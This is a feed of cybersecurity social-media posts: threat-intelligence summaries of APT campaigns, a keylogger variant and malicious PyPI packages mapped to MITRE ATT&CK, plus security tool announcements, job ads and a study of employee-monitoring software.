SUSE announces AI-powered integration with @SUSE Security and Microsoft Sentinel
https://www.admin-magazine.com/News/SUSE-Security-Announces-Integration-with-Microsoft-Sentinel?utm_source=SM
#SUSE #Sentinel #Microsoft #ArtificialIntelligence #security #integration #Copilot #ThreatDetection
The AI Arms Race: Cybercriminals Harnessing AI While Defenders Innovate
As cybercriminals leverage AI for more sophisticated attacks, the cybersecurity industry is racing to develop countermeasures. From AI-driven phishing schemes to advanced threat detection, the battle ...
https://news.lavx.hu/article/the-ai-arms-race-cybercriminals-harnessing-ai-while-defenders-innovate
Good day everyone!
An APT group known as Angry Likho (a.k.a. Sticky Werewolf) is being monitored by Kaspersky's Securelist researchers and they have identified hundreds of victims of a recent attack in Russia, several in Belarus, and additional incidents in other countries. They used an age-old technique of spear-phishing to gain initial access that had various attachments that would contain the legitimate bait file as well as other files, in some cases malicious LNK files. Execution would lead to a newly discovered implant named FrameworkSurvivor.exe.
As usual, check out all the juicy details that I left out and enjoy the read! Happy Hunting!
Angry Likho: Old beasts in a new forest
https://securelist.com/angry-likho-apt-attacks-with-lumma-stealer/115663/
Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday
PRevent: Open-source tool to detect malicious code in pull requests https://www.helpnetsecurity.com/2025/02/20/prevent-open-source-tool-to-detect-malicious-code-in-pull-requests/ #softwaredevelopment #threatdetection #codeanalysis #programming #JavaScript #opensource #Don'tmiss #Hotstuff #Apiiro #GitHub #Kotlin #Python #News #Java #Ruby #PHP
Good day everyone!
Fortinet's FortiGuard Labs discovered a new variant of the #Snake keylogger, a.k.a. "404 Keylogger". According to the report most of the detections from their "FortiSandbox" have come from China, Turkey, Indonesia, Taiwan, and Spain but if you aren't from these countries, you still may be a target!
Behaviors (MITRE ATT&CK):
Persistence - TA0003:
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder - After the malware is executed and drops a copy of itself in the %Local_AppData%\supergroup directory then copies itself the the %Startup% folder.
Defense Evasion - TA0005:
Process Injection: Process Hollowing T1055.012 - The malware injects itself into a legitimate .NET process, in this sample it was RegSvcs.exe. This allowed it to run within a trusted process to evade detection.
Command And Control - TA0011:
Application Layer Protocol: Web Protocols - T1071.001
Application Layer Protocol: Mail Protocols - T1071.003
The malware used multiple techniques to upload stolen credentials. The researchers observed SMTP, Telegram bots, and HTTP Post requests to transmit the data.
As usual, go check out the research for yourself to check out the details that I left out and support the good work! Enjoy and Happy Hunting!
FortiSandbox 5.0 Detects Evolving Snake Keylogger Variant
https://www.fortinet.com/blog/threat-research/fortisandbox-detects-evolving-snake-keylogger-variant
Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday
Good day everyone, new Blizzard has dropped!
Microsoft's Threat Intelligence shares their research on a Russian state actor dubbed #SeashellBlizzard! Part of the GRU, they specialize in operations from espionage to information operation and cyber-enabled disruptions which have resulted in destructive attacks and manipulation of ICS. They have leveraged different types of malware to include #KillDisk, #FoxBlade, and #NotPetya.
Behavior Summary (With MITRE ATT&CK):
Initial Access - TA0001:
Exploit Public-Facing Application - T1190
Seashell Blizzard commonly exploited vulnerable public facing infrastructure.
Persistence - TA0003:
Create or Modify System Process: Windows Service - T1543.003 -
Among other means of persistence, Seashell Blizzard created a system service.
Execution - TA0002:
Command and Scripting Interpreter: PowerShell - T1059.001
Command and Scripting Interpreter: Windows Command Shell - T1059.003
Seashell Blizzard abused both of these living off the land binaries for multiple reasons and using multiple different parameters.
As always, there is WAAAAY too many technical details here, so go check it out yourself! Enjoy the read and Happy Hunting!
The BadPilot campaign: Seashell Blizzard subgroup conducts multiyear global access operation
https://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/
Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday
Kunai pushes further integration with MISP!
This week, we've made significant progress in bridging Kunai with @misp to enhance threat intelligence sharing. Our focus has been on developing kunai-to-misp, a new tool available at https://github.com/kunai-project/pykunai, which processes Kunai logs and creates MISP events to streamline collaboration.
With this, it is now possible to both update MISP from Kunai and feed Kunai from MISP using the misp-to-kunai tool. Here's a practical workflow example:
Analyze a #linux malware sample with Kunai Sandbox (https://github.com/kunai-project/sandbox)
Use kunai-to-misp on the collected Kunai logs
(Optional) Review attributes' IDS flag to maximize detections and reduce false positives
Use misp-to-kunai to distribute the results across all Kunai endpoints
Additionally, we're leveraging MISP’s data model to craft meaningful MISP objects and relationships, offering a clear visual representation of events inside MISP.
Try it out and let us know what you think!
Good day everyone!
While #DeepSeek is making headlines as a competitor to the leading AI tools, bad actors are taking advantage of the hype. Positive Technologies's Supply Chain Security Team detected and prevented a malicious campaign in the Python Package Index (PyPi). The targets were developers, ML engineers, and ordinary AI enthusiasts who were looking into DeepSeek. They noticed a user uploaded two packages, deepseeek and deepseekai that contained functions to collect user and computer data and steal environment variables from it's victims.
Go check out the article for the rest of the technical details and this is a nice example of the good guys getting a win, your work is much appreciated! Enjoy and Happy Hunting!
Malicious packages deepseeek and deepseekai published in Python Package Index
Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday
Late night conversations on how to stop botnets like Mirai...
Now Available in the AWS Marketplace!
Check out our listing to see how we enable security practitioners to stop threats before they happen, using best-in-class internet intelligence data, detection and monitoring tools, and predictive risk scoring.
HIRING: Staff Security Engineer – Security Operations and Incident Response / Remote (Non CA)
USD 125K+
#WorkSurveillance #Surveillance #WageSlavery #SIEM #UEBA #CyberSecurity #ThreatDetection #BehaviorProfiling: "This case study explores, examines and documents how employers can use software that analyzes extensive personal data on employee behavior and communication for cybersecurity, insider threat detection and compliance purposes. To illustrate wider practices, it investigates software for “security information and event management” (SIEM), “user and entity behavior analytics” (UEBA), insider risk management and communication monitoring from two major vendors. First, it looks into cybersecurity and risk profiling systems offered by Forcepoint, a software vendor that was until recently owned by the US defense giant Raytheon. Second, it investigates in detail how employers can use cybersecurity and risk profiling software sold by Microsoft, whose “Sentinel” and “Purview” systems provide SIEM, UEBA, insider risk management and communication monitoring functionality. Combined, these systems can monitor everything employees do or say, profile their behavior and single them out for further investigation. Similar to predictive policing technologies, they promise not only to detect incidents but to prevent them before they occur. While organizations can use these software systems for legitimate purposes, this study focuses on their potential implications for employees."
https://crackedlabs.org/en/data-work/publications/securityriskprofiling
Scattered Spider continues its operations despite high-profile arrests. These arrests have pushed the group to iterate and adopt new tactics, including using different domain name patterns to target new employees unfamiliar with security protocols.
https://www.govinfosecurity.com/tracking-elusive-cybercriminals-through-domain-analysis-a-26022
Key Insights from Malachi Walker, Security Adviser at DomainTools:
The group’s decentralized structure allows it to remain resilient and operational.Analyzing domain registrations and IP addresses can uncover connections between campaigns and aid law enforcement.Knowing when a domain was created helps narrow down the compromise window and block associated domains.
Watch Malachi Walker’s interview at DEF CON 2024 with Information Security Media Group (ISMG) to learn more about:Scattered Spider’s decentralized operationsThe importance of a domain activity timelineProactive threat detection and incident response
Stay vigilant and proactive! 
HIRING: Information Security Engineers / New York City
